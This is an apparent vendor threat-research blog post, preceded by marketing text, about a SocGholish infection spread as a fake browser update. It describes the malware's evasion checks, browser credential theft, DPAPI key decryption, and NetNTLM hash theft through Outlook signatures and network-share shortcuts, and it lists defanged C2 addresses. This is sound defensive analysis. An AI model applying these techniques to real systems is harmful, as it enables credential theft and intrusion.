Combine cutting-edge XDR technology, multi-signal threat intelligence and 24/7 Elite Threat Hunters to help you build a world-class security operation.
Our team delivers the fastest response time in the industry. Threat suppression within just 4 hours of being engaged.
Cyber risk and advisory programs that identify security gaps and build security strategies to address them.
24/7 SOC-as-a-Service with unlimited threat hunting and incident handling.
XDR with machine learning that eliminates noise, enables real-time detection and response, and automatically blocks threats.
Seamless integration and threat investigation across your existing tech stack.
Proactive threat intelligence, original threat research and a world-class team of seasoned industry veterans.
Extend your team capabilities and prevent business disruption with expertise from eSentire.
We balance automated blocks with rapid human-led investigations to manage threats.
Guard endpoints by isolating and remediating threats to prevent lateral spread.
Defend brute force attacks, active intrusions and unauthorized scans.
Investigation and threat detection across multi-cloud or hybrid environments.
Remediate misconfigurations, vulnerabilities and policy violations.
Investigate and respond to compromised identities and insider threats.
Stop ransomware before it spreads.
Meet regulatory compliance mandates.
Detect and respond to zero-day exploits.
End misconfigurations and policy violations.
Defend third-party and supply chain risk.
Prevent disruption by outsourcing MDR.
Adopt a risk-based security approach.
Meet insurability requirements with MDR.
Protect your most sensitive data.
Build a proven security program.
Operationalize timely, accurate, and actionable cyber threat intelligence.
THE THREAT In recent weeks, eSentire’s Threat Response Unit (TRU) has traced numerous email account compromise cases to infrastructure hosted on several related hosting…
Dec 10, 2024THE THREATUpdate: Security patches to address this vulnerability were released by Cleo on December 12th. Organizations need to update to Cleo Harmony, VLTrader, and LexiCom versions…
eSentire is The Authority in Managed Detection and Response Services, protecting the critical data and applications of 2000+ organizations in 80+ countries from known and unknown cyber threats. Founded in 2001, the company’s mission is to hunt, investigate and stop cyber threats before they become business disrupting events.
We provide sophisticated cybersecurity solutions for Managed Security Service Providers (MSSPs), Managed Service Providers (MSPs), and Value-Added Resellers (VARs). Find out why you should partner with eSentire, the Authority in Managed Detection and Response, today.
Multi-Signal MDR with 300+ technology integrations to support your existing investments.
24/7 SOC-as-a-Service with unlimited threat hunting and incident handling.
Three MDR package tiers are available based on per-user pricing and level of risk tolerance.
The latest security advisories, blogs, reports, industry publications and webinars published by TRU.
Compare eSentire to other Managed Detection and Response vendors to see how we stack up against the competition.
See why 2000+ organizations globally have chosen eSentire for their MDR Solution.
2024-06-15 - This blog has been updated with additional details regarding the purpose behind email signature modification.
Adversaries don’t work 9-5 and neither do we. At eSentire, our 24/7 SOCs are staffed with Elite Threat Hunters and Cyber Analysts who hunt, investigate, contain and respond to threats within minutes.
We have discovered some of the most dangerous threats and nation state attacks in our space – including the Kaseya MSP breach and the more_eggs malware.
Our Security Operations Centers are supported with Threat Intelligence, Tactical Threat Response and Advanced Threat Analytics driven by our Threat Response Unit – the TRU team.
In TRU Positives, eSentire’s Threat Response Unit (TRU) provides a summary of a recent threat investigation. We outline how we responded to the confirmed threat and what recommendations we have going forward.
Here’s the latest from our TRU Team…
In April 2024, eSentire's Threat Response Unit (TRU) identified and traced hands-on-keyboard activity to a SocGholish infection initiated by a fake browser update. The fake update used obfuscated JavaScript to evade detection and establish a foothold in the environment.
Attackers used living-off-the-land techniques to collect sensitive credentials and notably, configured web beacons in both email signatures and network shares to map out local and business-to-business relationships. This behavior would suggest an interest in exploiting these relationships to target business peers of interest.
The infection began when the user visited a compromised website and downloaded a fake browser update named "Update.js," disguised as a JavaScript file (MD5: 44a0b845b30dcdc26c8017a6714c46e9).
The compromised webpage contained injected JavaScript (Figure 1), and the link led to obfuscated JavaScript code (Figure 2).
The snippet of the deobfuscated script is shown below (Figure 3).
The script first checks if the browser is controlled by automation tools, such as Selenium, using the “navigator.webdriver” property. If this property is true, indicating that the browser might be under script or automation control, it triggers a function to load a script from a specified SocGholish URL and then terminates (lines 8-12). This behavior is highly likely designed to evade automated analysis and detection.
Next, the script checks whether the browser window has been manipulated significantly (e.g., if the difference between the outer and inner height or width of the window is unusually large). This can indicate an attempt to detect if it’s running in a potentially monitored or unconventional environment. If the manipulation is detected, it loads another script from a different URL (lines 14-21).
Additionally, the script examines whether the user is logged into a WordPress site by searching for specific cookie identifiers like “wordpress_logged_in” or “wp-settings”. If these cookies are detected, the script refrains from executing any further actions (lines 23-27).
If none of the mentioned conditions trigger, the script sets up an event listener for mouse movements. Upon the first mouse movement detected, it removes this listener and loads another script from yet another URL. This is possibly a technique to only trigger script loading after user interaction, which can help bypass certain types of detection mechanisms that look for malicious activity upon page load (lines 32-37).
The _0x4d8183 function (lines 40-47) is dynamically used to insert a script element into the webpage. This function takes a URL as an argument, creates a <script> element, sets its src attribute to the provided URL, and appends it to the first script tag found in the document. This method of script injection allows external code to be run within the webpage context.
The example of URLs provided in the script are:
These are triggered under specific conditions in the script that have been mentioned, executing external code when certain criteria are met, such as the detection of automation tools or particular user interactions.
The downloaded malicious Update.js file contains an obfuscated JavaScript (Figure 4).
The script makes a POST request to the URL hxxps://tfuq.register.arpsychotherapy[.]com/editContent. The “send” method sends the request to the server with data “lpZw+wmbGiagWaoqNM/HmfLjMBYLsTv26io31cysSA==” (Figure 5).
Post-exploitation Activity
17 minutes after the malicious JavaScript payload was executed by the user, we identified hands-on-keyboard activity on the victim asset. This activity included stored password extraction, decryption, and reconnaissance.
Password Store Extraction
The threat actors extracted saved login data from Microsoft Edge and Google Chrome and copied them to a temporary file for exfiltration using the following commands:
Shortly after, another command was run to copy login data files from both Edge and Chrome browsers to a different user's Downloads directory, then log activity or errors to a temporary file (username – is the primary infected user, usename_2 is another user on the same machine):
Staging the credential data under another user is likely done for redundancy purposes in case the main files are discovered.
Encryption Key Retrieval
Next, the threat actors attempted to run a base64-encoded command via PowerShell. The decoded command retrieves and decrypts Edge’s and Chrome's encryption keys for passwords and cookies using the DPAPI (Data Protection API) and outputs the results in a temporary file.
The decoded commands:
Python Script Execution
Subsequently, the threat actors attempted to execute and run the PowerShell command 10 times, which performs several operations related to downloading, extracting, and setting up a portable version of Python on an infected machine under the “AppDataLocalConnectedDevicesPlatform” path to possibly run additional Python payloads.
Email Contact Reconnaissance
The threat actors then ran a base64-encoded command via Powershell to modify HTML signature files used by Microsoft Outlook.
The command lists above all HTML (.htm) files in the directory used for storing Microsoft Outlook email signatures and replaces the </body> tag with a modified version that includes an <img> tag right before the original </body> tag. This <img> tag inserts an image from a remote server (specified by the URL in the command). The command then redirects any output from the PowerShell command to a temporary file for logging purposes.
The purpose of the command is to steal NetNTLM hashes via the email signatures (special thanks to Max Anderson, an Assistant Vice President at Pondurance, for bringing this to our attention). You can read more about the technique here.
Network Discovery
The threat actors then listed the members of the “domain users” group in a domain environment by running the C:\Windows\system32\net1 group "domain users" /domain command.
The last command is responsible for creating the shortcuts within the network share. The target path points to the network share location. The shortcut icon points to the SocGholish C2 server 170.130.55[.]72/Documentation.ico.
We assume that the purpose of this command is similar to the email signature case mentioned above.
The SocGholish intrusion campaign showcased a social engineering approach to first gain entry through fake updates and then initiate a series of scripted actions to extract sensitive data and monitor user interactions.
Our team of 24/7 SOC Cyber Analysts isolated the affected host and notified the customer of suspicious activities.
We recommend implementing the following controls to help secure your organization against SocGholish malware:
You can access the indicators here.
The eSentire Threat Response Unit (TRU) is an industry-leading threat research team committed to helping your organization become more resilient. TRU is an elite team of threat hunters and researchers that supports our 24/7 Security Operations Centers (SOCs), builds threat detection models across the eSentire XDR Cloud Platform, and works as an extension of your security team to continuously improve our Managed Detection and Response service. By providing complete visibility across your attack surface and performing global threat sweeps and proactive hypothesis-driven threat hunts augmented by original threat research, we are laser-focused on defending your organization against known and unknown threats.